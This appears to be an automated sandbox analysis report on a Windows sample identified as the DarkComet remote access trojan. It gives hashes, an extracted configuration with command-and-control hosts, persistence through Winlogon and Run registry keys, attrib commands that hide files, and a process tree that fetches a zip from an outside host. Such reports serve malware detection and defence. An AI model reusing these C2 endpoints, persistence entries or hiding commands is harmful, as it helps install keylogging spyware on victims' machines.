Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 16:15
Static task
static1
Behavioral task
behavioral1
Sample
Программа.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Программа.exe
Resource
win10v2004-20241007-en
General
-
Target
Программа.exe
-
Size
1.3MB
-
MD5
4fe5233fe247d7fe49ce80e8ea123822
-
SHA1
31b52c9c20f168cc13dc9a65f3cb3fa895dccfa8
-
SHA256
08915c724cd73b5f0272eeda53c2f86ba371521520f04d826ad171a564eb6f63
-
SHA512
824094053dff9a6cfa2279feb80ad7c638eda0c4517aa8f9c8dbb500bfda6ef40f6cd369b35bdfc098eb9f65572c9e561dc4b2921f7c34b0a0f3b48af25b81b5
-
SSDEEP
24576:QNQ0lNT0jhJgZUdYuWq1V4/LkLSL9tYavX5c3Nql1hVTSjCeCrz:H0HShJmEY8+/LB9tYaxc3Ng1hVZ7z
Malware Config
Extracted
darkcomet
wuàuclt Cant kill
minedroid.ddns.net:1604
minedroid1.ddns.net:1604
minedroid2.ddns.net:1604
minedroid.zapto.org:1604
DC_MUTEX-WAY5XHM
-
InstallPath
Sys32\wu�uclt.exe
-
gencode
u20uH1Gywf95
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
Windows Update
Signatures
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
wu0uclt.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\Sys32\\wuàuclt.exe" wu0uclt.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exepid Process 4268 attrib.exe 4624 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Программа.exewu0uclt.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Программа.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation wu0uclt.exe -
Executes dropped EXE 3 IoCs
Processes:
wu0uclt.exeProgramm.exewuàuclt.exepid Process 1928 wu0uclt.exe 208 Programm.exe 3596 wuàuclt.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
wu0uclt.exewuàuclt.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sys32\\wuàuclt.exe" wu0uclt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sys32\\wuàuclt.exe" wuàuclt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Программа.exewu0uclt.execmd.execmd.exeattrib.exewuàuclt.exeProgramm.exePING.EXEcmd.exeattrib.exenotepad.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Программа.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wu0uclt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wuàuclt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Programm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2808 cmd.exe 3676 PING.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
wu0uclt.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ wu0uclt.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepid Process 3612 msedge.exe 3612 msedge.exe 1860 msedge.exe 1860 msedge.exe 2712 identity_helper.exe 2712 identity_helper.exe 2812 msedge.exe 2812 msedge.exe 2812 msedge.exe 2812 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
wuàuclt.exepid Process 3596 wuàuclt.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
msedge.exepid Process 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
wu0uclt.exewuàuclt.exedescription pid Process Token: SeIncreaseQuotaPrivilege 1928 wu0uclt.exe Token: SeSecurityPrivilege 1928 wu0uclt.exe Token: SeTakeOwnershipPrivilege 1928 wu0uclt.exe Token: SeLoadDriverPrivilege 1928 wu0uclt.exe Token: SeSystemProfilePrivilege 1928 wu0uclt.exe Token: SeSystemtimePrivilege 1928 wu0uclt.exe Token: SeProfSingleProcessPrivilege 1928 wu0uclt.exe Token: SeIncBasePriorityPrivilege 1928 wu0uclt.exe Token: SeCreatePagefilePrivilege 1928 wu0uclt.exe Token: SeBackupPrivilege 1928 wu0uclt.exe Token: SeRestorePrivilege 1928 wu0uclt.exe Token: SeShutdownPrivilege 1928 wu0uclt.exe Token: SeDebugPrivilege 1928 wu0uclt.exe Token: SeSystemEnvironmentPrivilege 1928 wu0uclt.exe Token: SeChangeNotifyPrivilege 1928 wu0uclt.exe Token: SeRemoteShutdownPrivilege 1928 wu0uclt.exe Token: SeUndockPrivilege 1928 wu0uclt.exe Token: SeManageVolumePrivilege 1928 wu0uclt.exe Token: SeImpersonatePrivilege 1928 wu0uclt.exe Token: SeCreateGlobalPrivilege 1928 wu0uclt.exe Token: 33 1928 wu0uclt.exe Token: 34 1928 wu0uclt.exe Token: 35 1928 wu0uclt.exe Token: 36 1928 wu0uclt.exe Token: SeIncreaseQuotaPrivilege 3596 wuàuclt.exe Token: SeSecurityPrivilege 3596 wuàuclt.exe Token: SeTakeOwnershipPrivilege 3596 wuàuclt.exe Token: SeLoadDriverPrivilege 3596 wuàuclt.exe Token: SeSystemProfilePrivilege 3596 wuàuclt.exe Token: SeSystemtimePrivilege 3596 wuàuclt.exe Token: SeProfSingleProcessPrivilege 3596 wuàuclt.exe Token: SeIncBasePriorityPrivilege 3596 wuàuclt.exe Token: SeCreatePagefilePrivilege 3596 wuàuclt.exe Token: SeBackupPrivilege 3596 wuàuclt.exe Token: SeRestorePrivilege 3596 wuàuclt.exe Token: SeShutdownPrivilege 3596 wuàuclt.exe Token: SeDebugPrivilege 3596 wuàuclt.exe Token: SeSystemEnvironmentPrivilege 3596 wuàuclt.exe Token: SeChangeNotifyPrivilege 3596 wuàuclt.exe Token: SeRemoteShutdownPrivilege 3596 wuàuclt.exe Token: SeUndockPrivilege 3596 wuàuclt.exe Token: SeManageVolumePrivilege 3596 wuàuclt.exe Token: SeImpersonatePrivilege 3596 wuàuclt.exe Token: SeCreateGlobalPrivilege 3596 wuàuclt.exe Token: 33 3596 wuàuclt.exe Token: 34 3596 wuàuclt.exe Token: 35 3596 wuàuclt.exe Token: 36 3596 wuàuclt.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid Process 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid Process 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wuàuclt.exepid Process 3596 wuàuclt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Программа.exewu0uclt.execmd.execmd.execmd.exewuàuclt.exeProgramm.exemsedge.exedescription pid Process procid_target PID 428 wrote to memory of 1928 428 Программа.exe 83 PID 428 wrote to memory of 1928 428 Программа.exe 83 PID 428 wrote to memory of 1928 428 Программа.exe 83 PID 428 wrote to memory of 208 428 Программа.exe 84 PID 428 wrote to memory of 208 428 Программа.exe 84 PID 428 wrote to memory of 208 428 Программа.exe 84 PID 428 wrote to memory of 2808 428 Программа.exe 85 PID 428 wrote to memory of 2808 428 Программа.exe 85 PID 428 wrote to memory of 2808 428 Программа.exe 85 PID 1928 wrote to memory of 2904 1928 wu0uclt.exe 87 PID 1928 wrote to memory of 2904 1928 wu0uclt.exe 87 PID 1928 wrote to memory of 2904 1928 wu0uclt.exe 87 PID 1928 wrote to memory of 804 1928 wu0uclt.exe 89 PID 1928 wrote to memory of 804 1928 wu0uclt.exe 89 PID 1928 wrote to memory of 804 1928 wu0uclt.exe 89 PID 2808 wrote to memory of 3676 2808 cmd.exe 90 PID 2808 wrote to memory of 3676 2808 cmd.exe 90 PID 2808 wrote to memory of 3676 2808 cmd.exe 90 PID 804 wrote to memory of 4268 804 cmd.exe 92 PID 804 wrote to memory of 4268 804 cmd.exe 92 PID 804 wrote to memory of 4268 804 cmd.exe 92 PID 2904 wrote to memory of 4624 2904 cmd.exe 93 PID 2904 wrote to memory of 4624 2904 cmd.exe 93 PID 2904 wrote to memory of 4624 2904 cmd.exe 93 PID 1928 wrote to memory of 3596 1928 wu0uclt.exe 94 PID 1928 wrote to memory of 3596 1928 wu0uclt.exe 94 PID 1928 wrote to memory of 3596 1928 wu0uclt.exe 94 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 3596 wrote to memory of 4776 3596 wuàuclt.exe 95 PID 208 wrote to memory of 1860 208 Programm.exe 109 PID 208 wrote to memory of 1860 208 Programm.exe 109 PID 1860 wrote to memory of 3620 1860 msedge.exe 110 PID 1860 wrote to memory of 3620 1860 msedge.exe 110 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 PID 1860 wrote to memory of 3872 1860 msedge.exe 111 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 4268 attrib.exe 4624 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Программа.exe"C:\Users\Admin\AppData\Local\Temp\Программа.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Users\Admin\AppData\Local\Temp\wu0uclt.exe"C:\Users\Admin\AppData\Local\Temp\wu0uclt.exe"2⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp\wu0uclt.exe" +s +h3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\Temp\wu0uclt.exe" +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp" +s +h3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\Temp" +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4268
-
-
-
C:\Users\Admin\AppData\Local\Temp\Sys32\wuàuclt.exe"C:\Users\Admin\AppData\Local\Temp\Sys32\wuàuclt.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\SysWOW64\notepad.exenotepad4⤵
- System Location Discovery: System Language Discovery
PID:4776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Programm.exe"C:\Users\Admin\AppData\Local\Temp\Programm.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://filehost.ru/upd/updatev162.zip3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc07546f8,0x7ffdc0754708,0x7ffdc07547184⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:24⤵PID:3872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:84⤵PID:656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:14⤵PID:1168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:14⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:14⤵PID:1112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:14⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:84⤵PID:3112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:2712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:14⤵PID:4964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:14⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:14⤵PID:3876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:14⤵PID:1772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,16733031548457732900,11697819098723487717,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:2812
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping -n 3 127.0.0.1 & copy /Y "C:\Users\Admin\AppData\Local\Temp\Programm.exe" "C:\Users\Admin\AppData\Local\Temp\?????????.exe" >> NUL2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\PING.EXEping -n 3 127.0.0.13⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3676
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2860
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2252
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD50a9dc42e4013fc47438e96d24beb8eff
SHA1806ab26d7eae031a58484188a7eb1adab06457fc
SHA25658d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA5126fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\21c058c8-451c-4e43-8b52-c1d859a1757f.tmp
Filesize538B
MD5df5d71fc49c69478b2d2964b93dbdd51
SHA1f13804689c25d8a3459c044efcee201048acad11
SHA256a6aba87682141ed9cd94b1b32c2db0c1c0c9e4cd559ad86e53f3181f64f87147
SHA5124847aff051a859e72265aae52eb0cabfa32d31d2e4f7302d307a63de0f29ce97cbe2332b745be3d68febae5257c11368d2098c6c6385904f65acd071889c2352
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize576B
MD588180f512ef14aaea9d536720716010d
SHA1e39f52dbf4758d44f7a9abfa711654c4a223f762
SHA2566eabe4fd60fff30b07333d10b5e3c481db6a41596cf4cbbe4a3aedaa83a4b971
SHA512f306634d36a7476fe48311a17679074e582dd7930276cf4b5ea2454ab817adac955d4ed460ab7bdd6a72785c4d5a679b13c812263f0623b7e0616d6d84567fc6
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\001\t\Paths\MANIFEST-000001
Filesize41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
644B
MD52945aad4db3faed1a3f794e15e4a58db
SHA11af8756098d8e697dbbb95d7a267a702b7b7bf7a
SHA256df008e64ce099f6d94de880f630cd93d12aedd369189255ac56320c33f8baf34
SHA512c102809a66242103871a5d58f8504d1d6e7da6b6fa03488f8d5f3f70f079e6dbfc150f5534ce8b30a60d2620411e9d2dccff4f628d7bd842932ca561fd084707
-
Filesize
5KB
MD593ff24d86d0aea58b74cdd763e1e4db4
SHA1e6f449336b0e617c4f1833fb27187d20c88d36c5
SHA25643578a4d3b49b8e4a3265826ba274a351529f93ffbb959c7e1e409a71a1b11a2
SHA512f90dcde0b2bc0234ff67a82e3f5fa04f1a8ec018f99cb772007b236af2000fbd03fcad8f4667fe9d32865f141e2e2cac3f979148d8e6f6875cc0c96663ea78b0
-
Filesize
6KB
MD5b8d590f49f0947adc7e9d82176ee29f6
SHA16559061b6e7eb0db171a5fdd98cf9e22c9319b05
SHA256c3585d4edfe3fabbc082fc61ff63965f35eb05f1576392928ada0f985c8b8309
